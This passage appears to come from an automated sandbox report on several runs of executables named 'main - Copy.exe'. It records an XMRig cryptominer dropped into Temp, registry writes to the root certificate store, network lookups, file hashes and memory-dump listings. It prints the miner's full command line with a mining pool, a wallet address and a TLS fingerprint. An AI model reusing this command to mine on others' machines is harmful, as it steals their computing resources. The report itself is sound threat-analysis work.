memory/4944-32-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-33-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-34-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-35-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-36-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-37-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-38-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-39-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-40-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-41-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-42-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-43-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-44-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-45-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-46-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-47-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-48-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-49-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-50-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-51-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-52-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-53-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-54-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-55-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-56-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-57-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-58-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-59-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-60-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-61-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-62-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-63-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-64-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-65-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-66-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-67-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-68-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-69-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-70-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-71-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-72-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-73-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-74-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-75-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-76-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-77-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-78-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-79-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-80-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-81-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

memory/4944-82-0x00007FF6E3660000-0x00007FF6E4163000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-06-14 12:47

Reported

2024-06-14 13:49

Platform

win10v2004-20240611-en

Max time kernel

1793s

Max time network

1784s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
NL 23.62.61.171:443 www.bing.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 171.61.62.23.in-addr.arpa udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 177.23.48.23.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
IE 52.111.236.22:443 tcp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 131.72.42.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/3968-14-0x0000024594110000-0x0000024594130000-memory.dmp

memory/3968-15-0x0000024594160000-0x0000024594180000-memory.dmp

memory/3968-16-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-18-0x00000245941A0000-0x00000245941C0000-memory.dmp

memory/3968-17-0x0000024594180000-0x00000245941A0000-memory.dmp

memory/3968-19-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-20-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-21-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-22-0x0000024594180000-0x00000245941A0000-memory.dmp

memory/3968-23-0x00000245941A0000-0x00000245941C0000-memory.dmp

memory/3968-24-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-25-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-26-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-27-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-28-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-29-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-30-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-31-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-32-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-33-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-34-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-35-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-36-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-37-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-38-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-39-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-40-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-41-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-42-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-43-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-44-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-45-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-46-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-47-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-48-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-49-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-50-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-51-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-52-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-53-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-54-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-55-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-56-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-57-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-58-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-59-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-60-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-61-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-62-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-63-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-64-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-65-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-66-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-67-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-68-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-69-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-70-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-71-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-72-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-73-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-74-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-75-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-76-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-77-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-78-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-79-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-80-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-81-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-82-0x00007FF601D40000-0x00007FF602843000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-14 12:47

Reported

2024-06-14 13:30

Platform

win10v2004-20240508-en

Max time kernel

1702s

Max time network

1715s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-06-14 12:47

Reported

2024-06-14 13:30

Platform

win10v2004-20240508-en

Max time kernel

1605s

Max time network

1617s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp

Files

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2024-06-14 12:47

Reported

2024-06-14 13:30

Platform

win10v2004-20240611-en

Max time kernel

1792s

Max time network

1788s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e0416041